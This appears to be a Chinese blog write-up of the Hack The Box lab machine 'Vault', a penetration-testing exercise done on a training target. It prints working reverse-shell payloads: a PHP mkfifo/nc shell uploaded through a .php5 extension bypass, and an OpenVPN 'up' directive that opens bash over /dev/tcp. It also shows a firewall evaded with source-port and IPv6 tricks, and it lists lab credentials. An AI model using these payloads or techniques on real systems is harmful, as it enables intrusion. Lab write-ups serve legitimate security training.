【HTB系列】靶机Vault的渗透测试详解

hacker4年前关于黑客接单308

  

  Kali: 10.10.14.213

  靶机地址:10.10.10.109

  先用nmap探测靶机

  nmap -sC -sT -sV 10.10.10.109

  扫描结果如下:

  

  看看80端口有什么东西

  

  我们用gobuster进行探测下

  gobuster -u http://10.10.10.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -o gobuster-sparklays -t 100

  扫了很久没有扫出什么东西

  后来注意到这句话

  We are proud to announce our first client: Sparklays (Sparklays.com still under construction)

  尝试在Url后面加上/sparklay

  ~# gobuster -u http://10.10.10.109/sparklays -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -t 100 -o gobuster-sparklays

  

  我们打开login.php

  

  打开下admin.php

  

  尝试过绕过以及常见帐户密码

  奇怪的是发现提交的帐户密码竟然是用GET方式,觉得很奇怪试着拦截登陆的数据包并放到sqlmap跑跑看,发现并没有注入点

  sqlmap -r sparklays-admin-login.req --batch

  

  我们在打开design

  

  是Forbidden,那么这个目录下我们在gobuster下

  gobuster -u http://10.10.10.109/sparklays/design -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php -t 100 -o gobuster-sparklays-design

  

  打开upload.php

  

  打开design.html看看

  

  点【Change Logo】

  

  我们写一个反弹的shell进行上传

  

  system('r, /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.213 1337 >/tmp/f');

  >

  被拒绝上传了

  

  我们来FUZZ下运行上传的后缀名看看能不能通过后缀名进行绕过

  这里我用到这个字典:

  https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt

  

  这里我用burp的intruder模块进行fuzz

  

  发现php5是上传成功的,我们把shell改成shell.php5再次上传

  

  然后我们kali 开启监听1337端口

  

  我们在访问

  http://10.10.10.109/sparklays/design/uploads/shell.php5

  然后就会得到一个shell

  

  发现有2个用户

  

  我在dave的Desktop目录下面看到一个ssh文件

  

  Cat下得到一下内容

  

  dave:Dav3therav3123

  那么我们通过ssh连接到靶机上

  

  我们在看看dave桌面上的其他文件

  

  之一个key还不知道是什么意思就先留着。

  第二个Servers应该是对应服务器的IP以及该服务器是什么

  我们现在对DNS服务器进行扫描看看,但是靶机上面没有nmap 但是我们可以用nc当作端口扫描器

  

  

  我们可以看到192.168.122.4开放了22和80端口。由于是内网的环境我们是无法访问到192.168.122.4的,所以我们需要做一个隧道把192.168.122.4的80端口映射到我们本地的1234端口

  ssh -L 1234:192.168.122.4:80

  

  

  点击【Click here to modify your DNS Settings】

  

  发现是Not Found

  点击【Click here to test your VPN Configuration】

  

  打开后是一个VPN配置信息,并允许我们测试我们的VPN

  这里我找一遍关于如何用ovpn配置文件反弹shell的教程

  https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da

  我们找下靶机的内网IP地址

  

  让靶机监听9002端口

  

  remote 192.168.122.1

  nobind

  dev tun script-security 2

  up "/bin/bash -c '/bin/bash -i > /dev/tcp/192.168.122.1/9002 0<&1 2>&1&'"

  

  先点【Update file】然后再点【Test VPN】

  就会得到一个shell

  

  得到userflag

  

  接下来是获取root flag

  我们在dave的目录里面找到一个ssh凭借

  

  dave:dav3gerous567

  我们直接通过ssh连接DNS服务器

  

  我们尝试sudo -i切换为root,

  

  但是目录里面没有我们想要的rootflag

  

  之前我们注意到在dave的机器上有三台服务器,但是最后的The vault 是没有给出IP地址的,root flag可能就在那台机器上,所以我们需要去找线索

  

  我们在DNS的hosts文件中找到了The vault的IP地址

  

  但是DNS服务器是无法ping通的

  

  但是DNS确实存在192.168.5.2的路由,猜测应该是禁止ping

  

  后来发现DNS存在nmap 我们用nmap来进行端口探测

  -Pn:表示默认主机在线,跳过主机发现

  -v:显示详细信息

  -n:不进行DNS解析

  

  发现2个端口都被closed,可能是真的关闭,但是也有可能是防火墙的原因

  我们尝试使用nmap 的 –source-port参数

  每个TCP数据包带有源端口号。默认情况下Nmap会随机选择一个可用的传出源端口来探测目标。该–source-port选项将强制Nmap使用指定的端口作为源端口。这种技术是利用了防火墙盲目地接受基于特定端口号的传入流量的弱点。端口21(FTP),端口53(DNS)和67(DHCP)是这种扫描类型的常见端口。

  

  发现一个987端口,我们用nc从本地的53端口进行连接

  

  是openssh服务

  对于这种防火墙我们可以尝试使用IPV6的规则绕过

  先查看DNS服务器是否支持IPV6

  

  FF02::1指所有开启了IPv6组播的主机,和IGMP中的224.0.0.1对应

  说明DNS服务器支持IPV6

  我们在查找下DNS服务器的的 邻居

  

  再看下DNS的路由和ip信息

  

  

  我们可以看到192.168.5.0/24的流量都要通过ens3到192.168.122.5去

  在192.168.155.5是防火墙的地址

  

  我们在看DNS的邻居,发现还有3条IPV6,说明vault的IPV6应该在里面

  我们在查看arp

  

  192.168.122.5对应的ipv6是fe80::5054:ff:fe3a:3bd5

  下面这2条ipv6的地址就是 valut和firewall的

  fe80::5054:ff:fec6:7066

  fe80::5054:ff:fee1:7441

  我们直接用nmap进行端口扫描,如果防火墙没有配置ipv6的规则的话如是valut的地址就会出现之前的987端口

  

  这样我们就确定了fe80::5054:ff:fec6:7066是vault的IPV6地址,并且防火墙规则并没有阻拦ipv6的地址,同时我们的DNS服务器可以直接通过ipv6绕过防火墙跟vault进行通讯

  那么我们直接ssh进行连接

  

  密码跟之前的一样:dav3gerous567

  

  

  

  我们可以看到这个pgp的ID为D1EB1F03

  我们看下vault系统是否存在密钥,不存在

  

  但是我们在dave@ubuntu上找到了

  

  所以我们需要把文件发送到dave@ubuntu进行解密

  我们退回到dave@DNS上,利用scp将文件拷贝出来

  scp -P 987 dave@[fe80::5054:ff:fec6:7066%ens3]:root* .

  输入密码:dav3gerous567

  

  

  然后我们需要在把这个文件传送到dave@ubuntu上面

  我们在ubuntu上面执行

  

  然后在DNS上把文件传输过来

  

  这样文件就到了Ubuntu上面了

  

  我们用md5sum来校验下文件的完整性

  

  

  文件正常传输的

  我们用gpg 解密下root.txt.gpg

  

  要求我们输入密码

  密码就是我们之前找到的key

  

  得到root flag

  

  

标签: 渗透测试

相关文章

搜库回应屏蔽搜索抓取:土豆网“闭关锁国”

1月13日信息,对于昨天马铃薯等视频平台屏蔽掉搜库检索爬取一事,搜库今天发出声明给予答复:优酷网声称屏蔽掉搜库,是致客户的要求于不管不顾,把偏激的市场竞争的心摆在首位,感情上下理性的个人行为。这让其本...

大屏幕电视(广场大屏幕电视多少钱)

大屏幕电视(广场大屏幕电视多少钱) 对于多大客厅用多大电视,一直是存在争论的,有的人建议大就是好,有的人觉得够用就行。评价君觉得这个最好比量下,这才能做到知己知彼,自己看着舒服。 比如说,对于3米...

怎么盗取QQ号?

  盗号一般都是为了2个目的 1,里面的QB,游戏B,QD。然后直接拿出来卖 2,如果你QQ号很好的话,比如说,位数少,或者特别好记。乃就会拿去卖了 但是盗号具有随机性,只有你的电脑中了木马才能让盗号...

2021年元旦节黄历-2021元旦节结婚是好日子吗

2021年元旦节黄历-2021元旦节结婚是好日子吗

2021年米旦节是在2021年1月1日,米旦节就是阳历一年中的第一天,很多人都会选择在米旦节的时候结婚,给接下来的一年带来一个好彩头,那么2021年米旦节的黄历如何呢?接下来大家就和小编一起了解一下2...

怎么查看别人手机短信内容

外卖是十分方便的,特别是对于上班族来说,中午基本应该都是点外卖了吧,但是外卖也是很没有营养的东西,特别是在父母的眼中,你在家点外卖需要偷偷摸摸吗?父母是如何看待外卖的呢?友谊长存小编带来介绍。 父母...

1.渗透思路(突破口寻找)

前言本篇文章作为我自己的学习总结,也为各位白帽,黑帽提供一个详细的进攻防守思路。让初学者对渗透有个宏观微观的认识。正文:把渗透比作一把武器,宏观认识为你提供武器内部构造,让你知道击发原理(渗透原理),...